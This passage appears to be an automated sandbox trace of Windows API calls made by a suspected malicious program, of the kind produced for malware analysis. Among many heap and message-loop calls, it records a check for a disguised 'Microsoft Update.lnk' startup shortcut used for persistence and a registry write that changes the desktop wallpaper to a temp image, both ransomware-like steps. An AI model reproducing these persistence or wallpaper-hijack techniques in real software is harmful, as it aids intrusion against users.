RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0261.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0261.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0261.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0261.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0261.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0261.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0261.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0261.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0261.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0261.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0261.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0261.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0261.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0261.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0261.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0261.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0261.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0261.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0261.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0261.614] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0261.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0261.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0261.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0261.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0261.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0261.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0261.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0261.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0261.745] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0261.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0261.745] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0261.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0261.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0261.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0261.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0261.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0261.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0261.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0261.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0261.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0261.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0261.747] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0261.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0261.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0261.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0261.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0261.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0261.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0261.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0261.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0261.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0261.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0261.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0261.748] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0261.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0261.748] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0261.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0261.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0261.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0261.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0261.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0261.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0261.748] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0261.867] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0261.868] timeGetTime () returned 0x118144e [0261.868] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0261.868] Sleep (dwMilliseconds=0xa) [0261.960] timeGetTime () returned 0x11814ac [0261.961] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0261.961] Sleep (dwMilliseconds=0xa) [0262.037] timeGetTime () returned 0x11814fa [0262.037] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.037] Sleep (dwMilliseconds=0xa) [0262.126] timeGetTime () returned 0x1181548 [0262.126] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.126] Sleep (dwMilliseconds=0xa) [0262.178] timeGetTime () returned 0x1181587 [0262.178] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.178] Sleep (dwMilliseconds=0xa) [0262.242] timeGetTime () returned 0x11815c5 [0262.242] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.242] Sleep (dwMilliseconds=0xa) [0262.334] timeGetTime () returned 0x1181623 [0262.334] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.334] Sleep (dwMilliseconds=0xa) [0262.351] timeGetTime () returned 0x1181633 [0262.351] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.352] Sleep (dwMilliseconds=0xa) [0262.384] timeGetTime () returned 0x1181652 [0262.384] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0262.384] TranslateMessage (lpMsg=0x8cf798) returned 0 [0262.384] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0262.384] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0262.384] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0262.384] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.384] Sleep (dwMilliseconds=0xa) [0262.407] timeGetTime () returned 0x1181662 [0262.407] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.407] Sleep (dwMilliseconds=0xa) [0262.514] timeGetTime () returned 0x11816cf [0262.514] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.514] Sleep (dwMilliseconds=0xa) [0262.548] timeGetTime () returned 0x11816f4 [0262.548] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.549] Sleep (dwMilliseconds=0xa) [0262.570] timeGetTime () returned 0x118170d [0262.570] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.570] Sleep (dwMilliseconds=0xa) [0262.628] timeGetTime () returned 0x118173c [0262.628] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.628] Sleep (dwMilliseconds=0xa) [0262.649] timeGetTime () returned 0x118175c [0262.649] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.651] Sleep (dwMilliseconds=0xa) [0262.672] timeGetTime () returned 0x118176b [0262.673] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.673] Sleep (dwMilliseconds=0xa) [0262.706] timeGetTime () returned 0x118178a [0262.706] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.706] Sleep (dwMilliseconds=0xa) [0262.727] timeGetTime () returned 0x11817aa [0262.727] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.727] Sleep (dwMilliseconds=0xa) [0262.763] timeGetTime () returned 0x11817c9 [0262.763] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.763] Sleep (dwMilliseconds=0xa) [0262.803] timeGetTime () returned 0x11817f8 [0262.803] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.803] Sleep (dwMilliseconds=0xa) [0262.851] timeGetTime () returned 0x1181827 [0262.851] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0262.851] Sleep (dwMilliseconds=0xa) [0262.896] timeGetTime () returned 0x1181856 [0262.897] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0262.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0262.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0262.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0262.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0262.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0262.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0262.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0262.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0262.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0262.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0262.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0262.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0262.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0262.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0262.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0262.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0262.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0262.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0262.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0262.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0262.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0262.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0262.899] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0262.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0262.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0262.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab590 [0262.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0262.899] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0262.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0262.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0262.900] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0262.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0262.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb058 [0262.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0262.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0262.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0262.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0262.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0262.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0262.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0262.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0262.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0262.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0262.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0262.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0262.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0262.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0262.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0262.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb058 | out: hHeap=0x2af0000) returned 1 [0262.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0262.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0262.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0262.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0262.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0262.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0262.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0262.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0262.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0262.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0262.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0262.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0262.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0262.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73488 [0262.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0262.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0262.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0262.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0262.901] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0262.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0262.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0262.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0262.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0262.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0262.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0262.902] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x3c0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0262.902] RegSetValueExW (in: hKey=0x3c0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0262.902] RegCloseKey (hKey=0x3c0) returned 0x0 [0262.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73488 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0262.903] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0262.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0262.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0262.903] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0262.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0262.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0262.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0262.904] RtlAllocateHeap (HeapHandle=0x2af0000, 